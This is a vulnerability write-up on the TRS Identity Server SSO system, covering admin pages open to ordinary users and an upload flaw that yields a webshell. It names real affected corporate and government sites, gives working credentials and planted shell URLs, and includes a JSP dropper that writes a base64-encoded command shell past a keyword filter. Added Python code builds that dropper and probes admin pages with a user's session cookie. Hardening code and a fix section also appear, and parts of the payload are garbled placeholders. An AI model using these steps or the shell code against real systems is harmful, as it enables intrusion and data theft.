A large set of unauthorized operations and a GETSHELL in a TRS system
Earlier versions and some secondary developments seem to be unaffected... security never ends!
/*
 * Note:
 * Copyright © 2004-2006 TRS: not affected
 * Copyright © 2004-2008 TRS: not affected
 * Some secondary developments are also unaffected
 *--------------------------------------
 * The over-permissive access lets any logged-in user view user information; several of the affected instances hold millions of user records.
 */
Program name: TRS Identity Server (TRSIDS) single sign-on system
Vulnerability type: unauthorized operations & arbitrary file upload (GETSHELL)
Vulnerable files:
Unauthorized operations (I did not count the endpoints; there are a great many). Every page below is under /ids/admin/ and is reachable with an ordinary user's session:
/ids/admin/sys/system/editSysParaCfg.jsp            system parameter settings
/ids/admin/sys/system/editRegCfg.jsp                system registration parameter settings (the receiving mailbox can be changed ...)
/ids/admin/sys/system/editRealNameCfg.jsp           real-name authentication parameter settings (the upload path and upload type can be set)
/ids/admin/sys/system/editLoginCfg.jsp              user logon parameter configuration
/ids/admin/sys/verifyCode/editVerifyCodeParaCfg.jsp verification code parameter settings
/ids/admin/sys/navigation.jsp                       system configuration
/ids/admin/notifycation/list.jsp                    outgoing mail list
/ids/admin/notifycation/detailMessage.jsp?Id=xxx    notification detail (contains the registration password in plaintext)
/ids/admin/user/list.jsp                            user list (password reset)
/ids/admin/ldap/domain/config_dir.jsp               LDAP directory settings
/ids/admin/ad/domain/add.jsp                        add an Active Directory domain
/ids/admin/sys/database/viewDbInfoCfg.jsp           view the database connection
/ids/admin/sys/http/edit.jsp                        HTTP parameter settings
/ids/admin/sys/accessPermission/edit.jsp            access control global parameter settings
/ids/admin/sys/auth/editCACfg.jsp                   certificate parameter settings
/ids/admin/sys/customfield/addColumn.jsp?BoName=User add a user attribute
/ids/admin/sys/customfield/list.jsp                 attribute list
/ids/admin/sys/group/editGroupAttributesMapping.jsp organization parameter settings
/ids/admin/sys/sso/edit.jsp                         cross-domain single sign-on parameter settings
/ids/admin/sys/synchronize/synchronizationConfig.jsp synchronization server parameter settings
http://idss.haier.net/ids/admin/sys/synchronize/listSynchronizer.jsp  synchronization server list
/ids/admin/coapp/viewUserSynchronization.jsp        [ids] system user synchronization configuration
/ids/admin/archivelog/config.jsp                    log archiving
Arbitrary file upload:
/ids/account/uploadAuthInfo.jsp
Exploitation:
Mask Region
*****?? number and other management operations; an ordinary user has a page for uploading an ID card,*****
I:
Let's look at the unauthorized operations first and pick a few serious pages to demonstrate. The other pages were tested too: the permission check is genuinely loose on all of them.
Case 1:
Mask Region
1.http://**.**.**/ids/_*****?trsadmin*****
Log in first, then view the user list (20,000+ users):
http://www.*******.com/ids/admin/user/list.jsp
Real-name authentication configuration:
http://www.*****.com/ids/admin/sys/system/editRealNameCfg.jsp
System parameter settings:
http://www.****.com/ids/admin/sys/system/editSysParaCfg.jsp
Outgoing message queue:
http://www.*****.com/ids/admin/notifycation/list.jsp
Case 2:
Mask Region
1.http://**.**.**/ids/ _*****?trsadmin*****
Similarly, log on as an ordinary user first:
http://*****.net/ids/account/main.jsp
Then open the user list (420,000+ users):
http://*****.net/ids/admin/user/list.jsp
Then the database connection information:
http://***.net/ids/admin/sys/database/viewDbInfoCfg.jsp
Then the system registration parameters (the administrator's email address can be changed):
http://*****.net/ids/admin/sys/system/editRegCfg.jsp
Case 3:
Mask Region
1.https://**.**.**/ids/admin/login.jsp _*****?trsadmin*****
Same steps; log on and open the user list directly (45+ users):
https://www.*****.gov.cn/ids/admin/user/list.jsp
Then the page for adding an Active Directory domain:
https://www.****.gov.cn/ids/admin/ad/domain/add.jsp
Case 4:
Mask Region
1.http://**.**.**/ids/admin/_*****?trsadmin*****
Log on and view the user list (20 million+ users).
Then the certificate parameter settings:
http://******.com.cn/ids/admin/sys/auth/editCACfg.jsp
And the cross-domain single sign-on parameter settings:
http://*****.com.cn/ids/admin/sys/sso/edit.jsp
Case 5:
Mask Region
1.http://**.**.**/ids/admin/_*****?trsadmin*****
Log on and view the user list as before.
Then the system configuration:
http://*****.ac.cn/ids/admin/sys/navigation.jsp
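The same check the cases above perform by hand, as an added example that is not part of the original report or of TRS. The page list is the report's; the fetch function is injected so the same logic runs against a live instance with an ordinary user's session cookie (http_fetch_with_cookie) or, as below, against constructed responses. How a denied request looks is an assumption (a 30x/401/403, or the login form served with 200), so LOGIN_MARKERS should be adjusted to the target.

```python
"""Probe the /ids/admin/ pages listed in the report with a non-admin session."""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

# Relative paths from the report (/ids is the application context root).
ADMIN_PAGES: List[str] = [
    "/ids/admin/sys/system/editSysParaCfg.jsp",
    "/ids/admin/sys/system/editRegCfg.jsp",
    "/ids/admin/sys/system/editRealNameCfg.jsp",
    "/ids/admin/sys/system/editLoginCfg.jsp",
    "/ids/admin/sys/verifyCode/editVerifyCodeParaCfg.jsp",
    "/ids/admin/sys/navigation.jsp",
    "/ids/admin/notifycation/list.jsp",
    "/ids/admin/user/list.jsp",
    "/ids/admin/ldap/domain/config_dir.jsp",
    "/ids/admin/ad/domain/add.jsp",
    "/ids/admin/sys/database/viewDbInfoCfg.jsp",
    "/ids/admin/sys/http/edit.jsp",
    "/ids/admin/sys/accessPermission/edit.jsp",
    "/ids/admin/sys/auth/editCACfg.jsp",
    "/ids/admin/sys/customfield/list.jsp",
    "/ids/admin/sys/group/editGroupAttributesMapping.jsp",
    "/ids/admin/sys/sso/edit.jsp",
    "/ids/admin/sys/synchronize/synchronizationConfig.jsp",
    "/ids/admin/sys/synchronize/listSynchronizer.jsp",
    "/ids/admin/coapp/viewUserSynchronization.jsp",
    "/ids/admin/archivelog/config.jsp",
]

Response = Tuple[int, str]          # (HTTP status, decoded body)
FetchFn = Callable[[str], Response]

# Assumed fingerprints of the login page: a 200 whose body shows one of these
# means the request was bounced to login rather than served.
LOGIN_MARKERS = ("admin/login.jsp", 'name="password"')


def is_exposed(status: int, body: str) -> bool:
    """True when the page was served to the caller (200 without the login form).
    3xx, 401 and 403 all count as the access check having fired."""
    if status != 200:
        return False
    lowered = body.lower()
    return not any(marker.lower() in lowered for marker in LOGIN_MARKERS)


def audit(fetch: FetchFn, base_url: str, pages: Iterable[str] = ADMIN_PAGES) -> Dict[str, bool]:
    """Map each admin path to whether the session behind `fetch` can read it."""
    base = base_url.rstrip("/")
    results: Dict[str, bool] = {}
    for path in pages:
        try:
            status, body = fetch(base + path)
        except OSError:                 # URLError is an OSError; unreachable is not evidence
            results[path] = False
            continue
        results[path] = is_exposed(status, body)
    return results


def exposed_pages(results: Dict[str, bool]) -> List[str]:
    return sorted(path for path, hit in results.items() if hit)


def http_fetch_with_cookie(cookie: str) -> FetchFn:
    """Real fetcher: present the ordinary user's session cookie and do not follow
    redirects, so a bounce to login.jsp is reported with its 30x status."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None                 # urllib then raises HTTPError carrying the 30x code
    opener = urllib.request.build_opener(NoRedirect)

    def fetch(url: str) -> Response:
        req = urllib.request.Request(url, headers={"Cookie": cookie})
        try:
            with opener.open(req, timeout=10) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode("utf-8", "replace")
    return fetch


# Constructed responses standing in for two servers: one that serves every
# admin page to anyone logged in, one that sends non-admins to the login form.
def fake_fetch_affected(url: str) -> Response:
    return 200, "<html><title>TRS IDS - %s</title><table>...</table></html>" % url.rsplit("/", 1)[-1]


def fake_fetch_patched(url: str) -> Response:
    if "/ids/admin/" in url:
        return 302, '<html>Redirecting to <a href="/ids/admin/login.jsp">login</a></html>'
    return 200, "<html>ok</html>"


if __name__ == "__main__":
    hits = exposed_pages(audit(fake_fetch_affected, "http://ids.example.invalid"))
    print("%d of %d admin pages readable by an ordinary user" % (len(hits), len(ADMIN_PAGES)))
```

Against a real target, pass the Cookie header value of an ordinary user's session to http_fetch_with_cookie and review the body of each hit by hand; a 200 that is really a custom error page would otherwise be counted as exposed.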
II:
Arbitrary file upload
File: /ids/account/uploadAuthInfo.jsp
The relevant code:

if (this.realNameAuthenticationService.isApply(userName)) {
    // A file already exists for this user: the stored name is built from the
    // user name, which the user controls, so the name can be truncated/traversed.
    UserRealNameInfo uRealNameInfo = this.realNameAuthenticationManager.find(userName);
    uploadFile = this.imageFileManager.find(uRealNameInfo.getUploadFileId());
    uploadFile.setNewFileName(userName + "." + fileType);
    uploadFile.setUploadTime(System.currentTimeMillis());
    uploadFile.setOriginalFileName(fileName);
    uploadFile.setFileSize(fileSize);
    uploadFile.setImageUrl(uploadPath);
    uploadFile.setType(type);
    this.imageFileManager.update(uploadFile);
    LOG.debug("update User realName authentication upload file success:" + uploadFile);
} else {
    // First upload: same naming, additionally prefixed with the current yyyyMM directory.
    uploadFile.setNewFileName(userName + "." + fileType);
    uploadFile.setUploadTime(System.currentTimeMillis());
    uploadFile.setOriginalFileName(fileName);
    uploadFile.setFileSize(fileSize);
    uploadFile.setImageUrl(uploadPath);
    uploadFile.setNewFileName(DateUtil.timeMillisToString(System.currentTimeMillis(), "yyyyMM")
            + File.separator + uploadFile.getNewFileName());
    uploadFile.setType(type);
    this.imageFileManager.add(uploadFile);
    LOG.debug("add User realName authentication upload file success:" + uploadFile);
}

TRS uploads to /WEB-INF/private/ by default, so there are two ways to break out. One is path traversal through the file name, which is built from the user name: /../../../username.jsp000000.jpg, which lands the shell in /ids/. The other is to change the upload directory (and the allowed upload type) through /ids/admin/sys/system/editRealNameCfg.jsp, which is reachable without admin rights as shown above; the file is then stored at /ids/<configured directory>/<current yyyyMM>/<username>.jsp (the yyyyMM prefix is added on the first upload, as the code shows).
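The two routes above, worked through in an added example that is not the project's code: the vulnerable function re-expresses in Python what the quoted Java does (name = userName + "." + fileType, prefixed with yyyyMM on the first upload, joined to the admin-configurable upload path) and sits beside a hardened derivation. The report writes the traversal name as /../../../username.jsp000000.jpg; the example models the truncation with a NUL byte, which is an assumption about the server's file API. WEBAPP_ROOT is the /TRS/TRSIDS3.5/webapps/ids path from the report's dropper; ALLOWED_TYPES is our choice.

```python
"""Upload-name derivation from uploadAuthInfo.jsp, modelled, beside a hardened version."""
import posixpath
import secrets
import time
from typing import Optional

WEBAPP_ROOT = "/TRS/TRSIDS3.5/webapps/ids"
UPLOAD_ROOT = WEBAPP_ROOT + "/WEB-INF/private"   # report: the default upload directory
ALLOWED_TYPES = {"jpg", "jpeg", "png", "gif"}     # ID-card images only (our choice)


def vulnerable_target(upload_path: str, user_name: str, file_type: str,
                      yyyymm: str, first_upload: bool = True) -> str:
    """Mirror of the quoted code: no normalisation, no extension check, and both
    the name (user name) and the directory (editRealNameCfg.jsp) are attacker-influenced."""
    new_name = user_name + "." + file_type
    if first_upload:
        new_name = yyyymm + "/" + new_name
    return upload_path + "/" + new_name


def effective_path(raw: str) -> str:
    """What the filesystem ends up with: the string cut at the first NUL byte
    (assumed, as older JVMs did) and '..' segments resolved."""
    return posixpath.normpath(raw.split("\x00", 1)[0])


def escapes_root(path: str, root: str) -> bool:
    root = posixpath.normpath(root)
    return posixpath.commonpath([posixpath.normpath(path), root]) != root


def hardened_target(upload_path: str, file_type: str) -> Optional[str]:
    """Server-generated name, whitelisted extension, and the resolved directory must
    stay under UPLOAD_ROOT. The user name is deliberately not part of the name."""
    ext = file_type.lower()
    if ext not in ALLOWED_TYPES:
        return None
    name = secrets.token_hex(16) + "." + ext
    target = posixpath.normpath(posixpath.join(upload_path, time.strftime("%Y%m"), name))
    if escapes_root(target, UPLOAD_ROOT):
        return None
    return target


if __name__ == "__main__":
    # Route 1: traversal in the user name; the NUL drops the ".jpg" the server appends.
    raw = vulnerable_target(UPLOAD_ROOT, "../../../trsadmin1.jsp\x00", "jpg", "201501")
    print(effective_path(raw))
    # Route 2: upload directory and type changed through editRealNameCfg.jsp.
    print(vulnerable_target(WEBAPP_ROOT + "/account", "trsadmin1", "jsp", "201501"))
    # Hardened: a .jsp type and a directory outside WEB-INF/private are both refused.
    print(hardened_target(WEBAPP_ROOT + "/account", "jsp"), hardened_target(UPLOAD_ROOT, "jpg"))
```

Route 1 resolves to /TRS/TRSIDS3.5/webapps/ids/trsadmin1.jsp and route 2 to .../ids/account/201501/trsadmin1.jsp, the two shell locations seen in the instances below. The containment check in hardened_target is what makes the admin-configurable directory safe even when editRealNameCfg.jsp itself is still exposed.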
Instance 1:
http://idss.haier.net/ids/
Username and password: trsadmin1/trsadmin1
Shell address after upload: http://******.net/ids/account/201501/trsadmin1.jsp
Instance 2:
http://app.sdwr.gov.cn/ids/admin/login.jsp
Username and password: trsadmin1/trsadmin1
Shell address: http://app.*****.gov.cn/ids/trsadmin1.jsp
Instance 3:
http://ids.shjnet.cn/ids/admin/login.jsp
Username and password: trsadmin1/trsadmin1
Shell address: http://ids.*****.cn/ids/201501/trsadmin1.jsp
Instance 4:
http://www.catr.cn/ids/
Username and password: trsadmin1/trsadmin1
Shell: http://www.****.cn/ids/trsadmin1.jsp
Instance 5:
http://www.hisense.com/ids/
Username and password: trsadmin1/trsadmin1
This instance inspects the uploaded input stream and rejects content containing keywords such as exec and ...putStream. An ordinary JSP shell contains exactly those words, so instead we write the shell through the FileUtil class that ships in trsids-server.jar itself: the forbidden words then live inside the application's own jar, never in the upload.
In com.trs.idm.util.FileUtil we only need these two functions:

public static void createTxtFile(File f) {
    if (!f.exists()) {
        try {
            f.createNewFile();
        } catch (IOException e) {
            LOG.error("error while create new file:" + f, e);
        }
        LOG.debug(f + " created!");
    } else {
        LOG.debug(f + " already exists!");
    }
}

public static void out(File f, String str) {
    out(f, str, "");
}

public static void out(File f, String str, String enc) {
    if (StringHelper.isEmpty(enc)) {
        enc = "UTF-8";
    }
    FileOutputStream fos = null;
    OutputStreamWriter out = null;
    BufferedWriter writer = null;
    try {
        fos = new FileOutputStream(f, true);   // append mode
        out = new OutputStreamWriter(fos, enc);
        writer = new BufferedWriter(out);
        writer.write(str);
        writer.newLine();
        writer.flush();
        LOG.debug("write str:" + str + " to file:" + f);
    } catch (IOException e) {
        LOG.error("error while write string:" + str + " to file:" + f, e);
        try {
            if (writer != null) { writer.close(); writer = null; }
            if (out != null) { out.close(); out = null; }
        } catch (IOException e2) {
            LOG.error("error while close writer and out", e2);
        }
    } finally {
        try {
            if (writer != null) { writer.close(); writer = null; }
            if (out != null) { out.close(); out = null; }
        } catch (IOException e) {
            LOG.error("error while close writer and out", e);
        }
    }
}
/**
 * Use a utility class from a jar already on the classpath to get past the
 * stream inspection; the shell is written successfully.
 */
<%@ page import="sun.misc.BASE64Decoder, java.io.*, java.util.*, com.trs.idm.util.FileUtil" contentType="text/html; charset=UTF-8" %>  // pulls in FileUtil
<%
String str = "/TRS/TRSIDS3.5/webapps/ids/account/trsadmin11.jsp";
File f = new File(str);
FileUtil.createTxtFile(f);
StringBuffer sb = new StringBuffer("");
// base64 of a plain JSP command shell; the first chunk decodes to
// <%@ page import="java.io.*" %><%try {String cmd = request.
sb.append("PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+PCV0cnkge1N0cmluZyBjbWQgPSByZXF1ZXN0L");
// the remaining chunks are given in the report only as follows
sb.append("success");
sb.append("success");
sb.append("success");
sb.append("success");
sb.append("separator = ");
String base64_str = new String(new BASE64Decoder().decodeBuffer(sb.toString()));
FileUtil.out(f, base64_str);
%>
Upload the file above using the user-name truncation so that it is stored as <username>.jsp, then request <username>.jsp; the real shell is written to the path named in str.
Shell address: http://www.*****.com/ids/account/trsadmin11.jsp?cmd=id
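Why the keyword inspection on instance 5 does not stop the dropper, and what scanning the decoded payload would have caught, as an added example that is neither the product's filter nor the report's code. BLOCKED_KEYWORDS is constructed from the report's description (it names exec and ...putStream). RAW_SHELL is a constructed JSP command shell whose opening text is what the report's first base64 chunk decodes to; the remainder is filled in here and is not from the page.

```python
"""Keyword blocklist on an upload stream versus a base64-carrying dropper."""
import base64
import re
from typing import List

BLOCKED_KEYWORDS = ["exec", "putstream"]     # constructed; matched case-insensitively

# First base64 chunk from the report's dropper.
REPORT_CHUNK = "PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+PCV0cnkge1N0cmluZyBjbWQgPSByZXF1ZXN0L"

# Constructed shell: the opening text is what REPORT_CHUNK decodes to.
RAW_SHELL = (
    '<%@ page import="java.io.*" %><%try {String cmd = request.getParameter("cmd");'
    'Process p = Runtime.getRuntime().exec(cmd);'
    'InputStream in = p.getInputStream(); int c;'
    'while ((c = in.read()) != -1) out.write(c);} catch (Exception e) {}%>'
)


def keyword_filter_rejects(upload: bytes) -> bool:
    """The filter the report describes: forbidden words in the raw stream."""
    lowered = upload.lower()
    return any(word.encode() in lowered for word in BLOCKED_KEYWORDS)


def build_dropper(shell_source: str, target_path: str) -> bytes:
    """Same shape as the report's dropper: the shell travels only as base64
    literals and is written out by the application's own FileUtil class."""
    b64 = base64.b64encode(shell_source.encode()).decode()
    chunks = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    lines: List[str] = [
        '<%@ page import="sun.misc.BASE64Decoder, java.io.*, com.trs.idm.util.FileUtil" %>',
        '<%',
        'File f = new File("%s");' % target_path,
        'FileUtil.createTxtFile(f);',
        'StringBuffer sb = new StringBuffer("");',
    ]
    lines += ['sb.append("%s");' % chunk for chunk in chunks]
    lines += [
        'FileUtil.out(f, new String(new BASE64Decoder().decodeBuffer(sb.toString())));',
        '%>',
    ]
    return "\n".join(lines).encode()


def report_chunk_matches() -> bool:
    """Ties RAW_SHELL to the page: its base64 starts with the report's chunk."""
    return base64.b64encode(RAW_SHELL.encode()).decode().startswith(REPORT_CHUNK)


# Quoted literals made only of base64 alphabet characters (the dropper's sb.append arguments).
B64_LITERAL = re.compile(rb'"([A-Za-z0-9+/]{8,}={0,2})"')


def decoded_scan_rejects(upload: bytes) -> bool:
    """Scan the raw bytes, then concatenate every base64-looking literal (the
    dropper splits its payload across sb.append calls) and scan the decoding."""
    if keyword_filter_rejects(upload):
        return True
    joined = b"".join(B64_LITERAL.findall(upload))
    if not joined:
        return False
    try:
        decoded = base64.b64decode(joined + b"=" * (-len(joined) % 4))
    except ValueError:
        return False
    return keyword_filter_rejects(decoded)


if __name__ == "__main__":
    dropper = build_dropper(RAW_SHELL, "/TRS/TRSIDS3.5/webapps/ids/account/trsadmin11.jsp")
    print("raw shell rejected by keyword filter:", keyword_filter_rejects(RAW_SHELL.encode()))
    print("dropper rejected by keyword filter:  ", keyword_filter_rejects(dropper))
    print("dropper rejected after decoding:     ", decoded_scan_rejects(dropper))
```

Decoding embedded literals catches this particular dropper, but a blocklist on content is not the control to rely on: the dangerous capability is the FileUtil class already on the server, reachable from any JSP the attacker can get executed. Preventing a JSP from being written under the web root (server-generated names, extension whitelist, containment check) is what actually closes the hole.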
Solution:
Enforce the admin role check server-side on every page under /ids/admin/, not only on the login page; in uploadAuthInfo.jsp stop deriving the stored file name from the user name, generate it server-side, restrict the extension to image types, and reject any upload path that resolves outside the intended directory.